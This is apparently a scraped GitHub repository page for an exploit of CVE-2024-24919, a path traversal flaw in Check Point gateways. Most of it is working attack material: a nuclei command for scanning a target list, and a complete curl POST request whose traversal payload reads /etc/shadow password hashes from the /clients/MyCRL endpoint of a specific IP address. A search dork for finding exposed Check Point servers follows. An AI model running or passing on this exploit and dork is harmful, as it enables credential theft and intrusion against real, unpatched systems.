0x3f3c / CVE-2024-24919

Geek Repo:Geek Repo

Github PK Tool:Github PK Tool

Check point:CVE-2024-24919

2024-05-31_08-14

run CVE

nuclei -list chick.txt -t CVE-2024-24919.yaml

Replace with the target IP address, and this command will attempt to access the /etc/shadow file, which contains password hashes.

curl --path-as-is -i -s -k -X POST \ -H 'Host: 117.102.198.7 ' \ -H 'Content-Length: 39' \ -H 'Connection: keep-alive' \ --data-binary 'aCSHELL/../../../../../../../etc/shadow' \ 'https://117.102.198.7/clients/MyCRL'

cve

Dork: "Server: Check Point SVN" "X-UA-Compatible: IE=EmulateIE7"

About


Languages

Language:Shell 100.0%